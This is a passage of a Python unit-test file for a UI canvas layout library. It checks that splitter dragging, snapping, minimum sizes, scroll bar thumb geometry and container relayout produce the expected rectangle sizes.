splitter_l = CanvasItem.SplitterCanvasItem("horizontal")
splitter_r = CanvasItem.SplitterCanvasItem("horizontal")
canvas_item1 = TestCanvasItem()
canvas_item2 = TestCanvasItem()
canvas_item3 = TestCanvasItem()
canvas_item4 = TestCanvasItem()
splitter_l.add_canvas_item(canvas_item1)
splitter_l.add_canvas_item(canvas_item2)
splitter_r.add_canvas_item(canvas_item3)
splitter_r.add_canvas_item(canvas_item4)
splitter.add_canvas_item(splitter_l)
splitter.add_canvas_item(splitter_r)
splitter_l.splits = [0.5, 0.5]
splitter_r.splits = [0.5, 0.5]
splitter.splits = [0.5, 0.5]
canvas_item.add_canvas_item(splitter)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=200, height=200))
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=100, height=100)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=100), size=Geometry.IntSize(width=100, height=100)))
self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=100, height=100)))
self.assertEqual(canvas_item4.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=100), size=Geometry.IntSize(width=100, height=100)))
def test_dragging_splitter_enforces_minimum_size(self):
# setup canvas
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
splitter = CanvasItem.SplitterCanvasItem()
canvas_item1 = TestCanvasItem()
canvas_item2 = TestCanvasItem()
splitter.add_canvas_item(canvas_item1)
splitter.add_canvas_item(canvas_item2)
canvas_item.add_canvas_item(splitter)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
# check assumptions
self.assertAlmostEqual(splitter.splits[0], 0.5)
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=320, height=480)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=320, y=0), size=Geometry.IntSize(width=320, height=480)))
# drag splitter
self.simulate_drag(canvas_widget, Geometry.IntPoint(x=320, y=240), Geometry.IntPoint(x=0, y=240))
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=64, height=480)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=64, y=0), size=Geometry.IntSize(width=576, height=480)))
def test_resizing_splitter_keeps_relative_sizes(self):
# setup canvas
canvas_item = CanvasItem.CanvasItemComposition()
splitter = CanvasItem.SplitterCanvasItem()
canvas_item1 = TestCanvasItem()
canvas_item2 = TestCanvasItem()
splitter.add_canvas_item(canvas_item1)
splitter.add_canvas_item(canvas_item2)
canvas_item.add_canvas_item(splitter)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
# check assumptions
self.assertAlmostEqual(splitter.splits[0], 0.5)
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=320, height=480)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=320, y=0), size=Geometry.IntSize(width=320, height=480)))
# update layout
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=720, height=480))
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=360, height=480)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=360, y=0), size=Geometry.IntSize(width=360, height=480)))
def test_resizing_splitter_slowly_keeps_relative_sizes(self):
# setup canvas
canvas_item = CanvasItem.CanvasItemComposition()
splitter = CanvasItem.SplitterCanvasItem()
canvas_item1 = TestCanvasItem()
canvas_item2 = TestCanvasItem()
splitter.add_canvas_item(canvas_item1)
splitter.add_canvas_item(canvas_item2)
canvas_item.add_canvas_item(splitter)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
# check assumptions
self.assertAlmostEqual(splitter.splits[0], 0.5)
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=320, height=480)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=320, y=0), size=Geometry.IntSize(width=320, height=480)))
# update layout
for w in range(640, 801, 4):
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=w, height=480))
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=400, height=480)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=400, y=0), size=Geometry.IntSize(width=400, height=480)))
def test_dragging_splitter_with_three_children_resizes_third_child(self):
# setup canvas
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
splitter = CanvasItem.SplitterCanvasItem()
canvas_item1 = TestCanvasItem()
canvas_item2 = TestCanvasItem()
canvas_item3 = TestCanvasItem()
splitter.add_canvas_item(canvas_item1)
splitter.add_canvas_item(canvas_item2)
splitter.add_canvas_item(canvas_item3)
canvas_item.add_canvas_item(splitter)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
# check assumptions
self.assertAlmostEqual(splitter.splits[0], 213.0 / 640.0)
self.assertAlmostEqual(splitter.splits[1], 213.0 / 640.0)
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=213, height=480)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=213, y=0), size=Geometry.IntSize(width=213, height=480)))
self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=426, y=0), size=Geometry.IntSize(width=214, height=480)))
# drag splitter
self.simulate_drag(canvas_widget, Geometry.IntPoint(x=426, y=240), Geometry.IntPoint(x=500, y=240))
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=213, height=480)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=213, y=0), size=Geometry.IntSize(width=500 - 213, height=480)))
self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=500, y=0), size=Geometry.IntSize(width=140, height=480)))
def test_dragging_splitter_with_three_children_resizes_third_child_after_second(self):
# setup canvas
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
splitter = CanvasItem.SplitterCanvasItem()
canvas_item1 = TestCanvasItem()
canvas_item2 = TestCanvasItem()
canvas_item3 = TestCanvasItem()
splitter.add_canvas_item(canvas_item1)
splitter.add_canvas_item(canvas_item2)
splitter.add_canvas_item(canvas_item3)
canvas_item.add_canvas_item(splitter)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
# check assumptions
self.assertAlmostEqual(splitter.splits[0], 213.0 / 640.0)
self.assertAlmostEqual(splitter.splits[1], 213.0 / 640.0)
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=213, height=480)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=213, y=0), size=Geometry.IntSize(width=213, height=480)))
self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=426, y=0), size=Geometry.IntSize(width=214, height=480)))
# drag splitters
self.simulate_drag(canvas_widget, Geometry.IntPoint(x=213, y=240), Geometry.IntPoint(x=220, y=240), modifiers=CanvasItem.KeyboardModifiers(shift=True))
self.simulate_drag(canvas_widget, Geometry.IntPoint(x=426, y=240), Geometry.IntPoint(x=500, y=240), modifiers=CanvasItem.KeyboardModifiers(shift=True))
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=220, height=480)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=220, y=0), size=Geometry.IntSize(width=500 - 220, height=480)))
self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=500, y=0), size=Geometry.IntSize(width=140, height=480)))
def test_dragging_splitter_with_three_children_should_only_resize_the_two_items_involved(self):
# problem occurred when resizing to minimum; it pulled space from uninvolved item
# setup canvas
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
splitter = CanvasItem.SplitterCanvasItem()
canvas_item1 = TestCanvasItem()
canvas_item2 = TestCanvasItem()
canvas_item3 = TestCanvasItem()
splitter.add_canvas_item(canvas_item1)
splitter.add_canvas_item(canvas_item2)
splitter.add_canvas_item(canvas_item3)
canvas_item.add_canvas_item(splitter)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
# check assumptions
self.assertAlmostEqual(splitter.splits[0], 213.0 / 640.0)
self.assertAlmostEqual(splitter.splits[1], 213.0 / 640.0)
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=213, height=480)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=213, y=0), size=Geometry.IntSize(width=213, height=480)))
self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=426, y=0), size=Geometry.IntSize(width=214, height=480)))
# drag splitter
self.simulate_drag(canvas_widget, Geometry.IntPoint(x=213, y=240), Geometry.IntPoint(x=0, y=240))
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=64, height=480)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=64, y=0), size=Geometry.IntSize(width=640 - 64 - 214, height=480)))
self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=640 - 214, y=0), size=Geometry.IntSize(width=214, height=480)))
def test_dragging_splitter_with_three_children_snaps_to_thirds(self):
# problem occurred when resizing to minimum; it pulled space from uninvolved item
# setup canvas
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
splitter = CanvasItem.SplitterCanvasItem()
canvas_item1 = TestCanvasItem()
canvas_item2 = TestCanvasItem()
canvas_item3 = TestCanvasItem()
splitter.add_canvas_item(canvas_item1)
splitter.add_canvas_item(canvas_item2)
splitter.add_canvas_item(canvas_item3)
canvas_item.add_canvas_item(splitter)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
# check assumptions
self.assertAlmostEqual(splitter.splits[0], 213.0 / 640.0)
self.assertAlmostEqual(splitter.splits[1], 213.0 / 640.0)
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=213, height=480)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=213, y=0), size=Geometry.IntSize(width=213, height=480)))
self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=426, y=0), size=Geometry.IntSize(width=214, height=480)))
# drag splitter away, then back
self.simulate_drag(canvas_widget, Geometry.IntPoint(x=213, y=240), Geometry.IntPoint(x=240, y=240), modifiers=CanvasItem.KeyboardModifiers(shift=True))
self.simulate_drag(canvas_widget, Geometry.IntPoint(x=240, y=240), Geometry.IntPoint(x=218, y=240))
self.assertAlmostEqual(splitter.splits[0], 213.0 / 640.0)
self.assertAlmostEqual(splitter.splits[1], 213.0 / 640.0)
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=213, height=480)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=213, y=0), size=Geometry.IntSize(width=213, height=480)))
self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=426, y=0), size=Geometry.IntSize(width=214, height=480)))
def test_dragging_splitter_snaps_to_half(self):
# problem occurred when resizing to minimum; it pulled space from uninvolved item
# setup canvas
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
splitter = CanvasItem.SplitterCanvasItem()
canvas_item1 = TestCanvasItem()
canvas_item2 = TestCanvasItem()
splitter.add_canvas_item(canvas_item1)
splitter.add_canvas_item(canvas_item2)
canvas_item.add_canvas_item(splitter)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
# check assumptions
self.assertAlmostEqual(splitter.splits[0], 320.0 / 640.0)
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=320, height=480)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=320, y=0), size=Geometry.IntSize(width=320, height=480)))
# drag splitter away, then back
self.simulate_drag(canvas_widget, Geometry.IntPoint(x=320, y=240), Geometry.IntPoint(x=300, y=240))
self.assertAlmostEqual(splitter.splits[0], 300.0 / 640.0)
self.simulate_drag(canvas_widget, Geometry.IntPoint(x=300, y=240), Geometry.IntPoint(x=316, y=240))
self.assertAlmostEqual(splitter.splits[0], 320.0 / 640.0)
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=320, height=480)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=320, y=0), size=Geometry.IntSize(width=320, height=480)))
def test_scroll_area_content_gets_added_at_offset_zero(self):
# setup canvas
canvas_item = CanvasItem.CanvasItemComposition()
content = TestCanvasItem()
content.update_layout(Geometry.IntPoint(), Geometry.IntSize(width=100, height=1000))
scroll_area = CanvasItem.ScrollAreaCanvasItem(content)
canvas_item.add_canvas_item(scroll_area)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=500))
self.assertEqual(content.canvas_origin, Geometry.IntPoint())
def test_scroll_bar_thumb_rect_disappears_when_visible_larger_than_content(self):
# setup canvas
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
content = TestCanvasItem()
content.update_layout(Geometry.IntPoint(), Geometry.IntSize(width=100, height=100))
scroll_area = CanvasItem.ScrollAreaCanvasItem(content)
scroll_bar = CanvasItem.ScrollBarCanvasItem(scroll_area)
canvas_item.add_canvas_item(scroll_area)
canvas_item.add_canvas_item(scroll_bar)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=500))
# check assumptions
self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=100, height=100)))
self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=16, height=0)))
def test_scroll_bar_can_adjust_full_range_of_content(self):
# setup canvas
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
content = TestCanvasItem()
content.update_layout(Geometry.IntPoint(), Geometry.IntSize(width=100, height=1000))
scroll_area = CanvasItem.ScrollAreaCanvasItem(content)
scroll_bar = CanvasItem.ScrollBarCanvasItem(scroll_area)
canvas_item.add_canvas_item(scroll_area)
canvas_item.add_canvas_item(scroll_bar)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=500), immediate=True)
# check assumptions
self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=16, height=250)))
self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=100, height=1000)))
# drag the thumb down as far as possible
self.simulate_drag(canvas_widget, Geometry.IntPoint(x=90, y=125), Geometry.IntPoint(x=90, y=500))
self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=250), size=Geometry.IntSize(width=16, height=250)))
self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=-500), size=Geometry.IntSize(width=100, height=1000)))
def test_scroll_bar_can_adjust_full_range_of_content_when_thumb_is_minimum_size(self):
# setup canvas
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
content = TestCanvasItem()
content.update_layout(Geometry.IntPoint(), Geometry.IntSize(width=100, height=30000), immediate=True)
scroll_area = CanvasItem.ScrollAreaCanvasItem(content)
scroll_bar = CanvasItem.ScrollBarCanvasItem(scroll_area)
canvas_item.add_canvas_item(scroll_area)
canvas_item.add_canvas_item(scroll_bar)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=500), immediate=True)
# check assumptions
self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=16, height=32)))
self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=100, height=30000)))
# drag the thumb down as far as possible
self.simulate_drag(canvas_widget, Geometry.IntPoint(x=90, y=8), Geometry.IntPoint(x=90, y=500))
self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=468), size=Geometry.IntSize(width=16, height=32)))
self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=-29500), size=Geometry.IntSize(width=100, height=30000)))
def test_resizing_scroll_area_with_scroll_bar_adjusts_thumb_rect(self):
# setup canvas
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
content = TestCanvasItem()
content.update_layout(Geometry.IntPoint(), Geometry.IntSize(width=100, height=1000))
scroll_area = CanvasItem.ScrollAreaCanvasItem(content)
scroll_bar = CanvasItem.ScrollBarCanvasItem(scroll_area)
canvas_item.add_canvas_item(scroll_area)
canvas_item.add_canvas_item(scroll_bar)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=500), immediate=True)
# check assumptions
self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=16, height=250)))
self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=100, height=1000)))
# resize the canvas item
canvas_item.size_changed(100, 750)
canvas_item.refresh_layout_immediate()
self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=16, height=int(750 * 0.75))))
self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=100, height=1000)))
def test_resizing_scroll_area_with_scroll_bar_adjusts_thumb_rect_when_canvas_is_offset_already(self):
# setup canvas
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
content = TestCanvasItem()
content.update_layout(Geometry.IntPoint(), Geometry.IntSize(width=100, height=1000), immediate=True)
scroll_area = CanvasItem.ScrollAreaCanvasItem(content)
scroll_bar = CanvasItem.ScrollBarCanvasItem(scroll_area)
canvas_item.add_canvas_item(scroll_area)
canvas_item.add_canvas_item(scroll_bar)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=500), immediate=True)
content._set_canvas_origin(Geometry.IntPoint(x=0, y=-500))
# check assumptions
self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=250), size=Geometry.IntSize(width=16, height=250)))
self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=-500), size=Geometry.IntSize(width=100, height=1000)))
# resize the canvas item
canvas_item.size_changed(100, 750)
canvas_item.refresh_layout_immediate()
self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=750 - int(750 * 0.75)), size=Geometry.IntSize(width=16, height=int(750 * 0.75))))
self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=-250), size=Geometry.IntSize(width=100, height=1000)))
def test_resizing_scroll_area_content_with_adjusts_thumb_rect(self):
# setup canvas
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
content = TestCanvasItem()
content.update_layout(Geometry.IntPoint(), Geometry.IntSize(width=100, height=1000))
scroll_area = CanvasItem.ScrollAreaCanvasItem(content)
scroll_bar = CanvasItem.ScrollBarCanvasItem(scroll_area)
canvas_item.add_canvas_item(scroll_area)
canvas_item.add_canvas_item(scroll_bar)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=500))
# check assumptions
self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=16, height=250)))
self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=100, height=1000)))
# resize the content. make sure the thumb_rect is correct.
content.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=750))
self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=16, height=int(500*2.0/3))))
self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=100, height=750)))
def test_resizing_scroll_area_content_with_scroll_bar_adjusts_content_position(self):
# setup canvas
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
content = TestCanvasItem()
content.update_layout(Geometry.IntPoint(), Geometry.IntSize(width=100, height=1000))
scroll_area = CanvasItem.ScrollAreaCanvasItem(content)
scroll_bar = CanvasItem.ScrollBarCanvasItem(scroll_area)
canvas_item.add_canvas_item(scroll_area)
canvas_item.add_canvas_item(scroll_bar)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=500))
content._set_canvas_origin(Geometry.IntPoint(x=0, y=-500))
# check assumptions
self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=250), size=Geometry.IntSize(width=16, height=250)))
self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=-500), size=Geometry.IntSize(width=100, height=1000)))
# resize the content. make sure that it will not let the origin be wrong.
content.update_layout(Geometry.IntPoint(x=0, y=-500), Geometry.IntSize(width=100, height=750))
self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=int(500*1.0/3+0.5)), size=Geometry.IntSize(width=16, height=int(500*2.0/3))))
self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=-250), size=Geometry.IntSize(width=100, height=750)))
def test_removing_item_from_layout_causes_container_to_relayout(self):
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
empty1 = CanvasItem.EmptyCanvasItem()
empty2 = CanvasItem.EmptyCanvasItem()
empty2.sizing.set_fixed_height(40)
canvas_item.add_canvas_item(empty1)
canvas_item.add_canvas_item(empty2)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=100), immediate=True)
# check assumptions
self.assertEqual(empty1.canvas_bounds.height, 60)
self.assertEqual(empty2.canvas_bounds.height, 40)
# remove 2nd canvas item
canvas_item.remove_canvas_item(empty2)
# check that column was laid out again
canvas_item.refresh_layout_immediate()
self.assertEqual(empty1.canvas_bounds.height, 100)
def test_removing_item_from_collapsible_layout_that_gets_resized_causes_container_to_relayout(self):
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
empty1 = CanvasItem.EmptyCanvasItem()
row = CanvasItem.CanvasItemComposition()
row.sizing.collapsible = True
row.layout = CanvasItem.CanvasItemRowLayout()
empty2 = CanvasItem.EmptyCanvasItem()
empty2.sizing.set_fixed_height(40)
canvas_item.add_canvas_item(empty1)
row.add_canvas_item(empty2)
canvas_item.add_canvas_item(row)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=100), immediate=True)
# check assumptions
self.assertEqual(empty1.canvas_bounds.height, 60)
self.assertEqual(row.canvas_bounds.height, 40)
self.assertEqual(empty2.canvas_bounds.height, 40)
# remove 2nd canvas item
row.remove_canvas_item(empty2)
# check that column was laid out again
canvas_item.refresh_layout_immediate()
self.assertEqual(empty1.canvas_bounds.height, 100)
self.assertEqual(row.canvas_bounds.height, 0)
def test_preferred_size_in_overlap_does_not_limit_sibling_sizes(self):
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
container = CanvasItem.CanvasItemComposition() # overlap layout
item1 = CanvasItem.CanvasItemComposition()
item2 = CanvasItem.CanvasItemComposition()
row = CanvasItem.CanvasItemComposition()
row.layout = CanvasItem.CanvasItemRowLayout()
column = CanvasItem.CanvasItemComposition()
column.layout = CanvasItem.CanvasItemColumnLayout()
row.add_stretch()
row.add_spacing(8)
column.add_stretch()
column.add_canvas_item(row)
column.add_spacing(8)
item1.add_canvas_item(column)
container.add_canvas_item(item1)
container.add_canvas_item(item2)
canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
canvas_item.add_canvas_item(container)
canvas_item.add_stretch()
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=100), immediate=True)
# check that items use full container (due to item2 not having preferred size)
self.assertIsNone(container.layout.get_sizing(container.canvas_items).preferred_height)
self.assertEqual(item1.canvas_size.width, 100)
self.assertEqual(item1.canvas_size.height, 50) # vertical is shared evenly between item1 and stretch
self.assertEqual(item2.canvas_size.width, 100)
self.assertEqual(item2.canvas_size.height, 50) # vertical is shared evenly between item2 and stretch
def test_preferred_width_in_column_does_not_limit_sibling_sizes(self):
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
container = CanvasItem.CanvasItemComposition() # column layout
container.layout = CanvasItem.CanvasItemColumnLayout()
item1 = CanvasItem.CanvasItemComposition()
item2 = CanvasItem.CanvasItemComposition()
row = CanvasItem.CanvasItemComposition()
row.layout = CanvasItem.CanvasItemRowLayout()
row.add_stretch()
row.add_spacing(8)
item1.add_canvas_item(row)
container.add_canvas_item(item1)
container.add_canvas_item(item2)
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item.add_canvas_item(container)
canvas_item.add_stretch()
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=100), immediate=True)
# check that items use full container width (due to item2 not having preferred width)
self.assertIsNone(container.layout.get_sizing(container.canvas_items).preferred_width)
self.assertEqual(item1.canvas_size.width, 50)
self.assertEqual(item1.canvas_size.height, 50) # vertical is shared evenly between item1 and stretch
self.assertEqual(item2.canvas_size.width, 50)
self.assertEqual(item2.canvas_size.height, 50) # vertical is shared evenly between item2 and stretch
def test_preferred_height_in_row_does_not_limit_sibling_sizes(self):
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
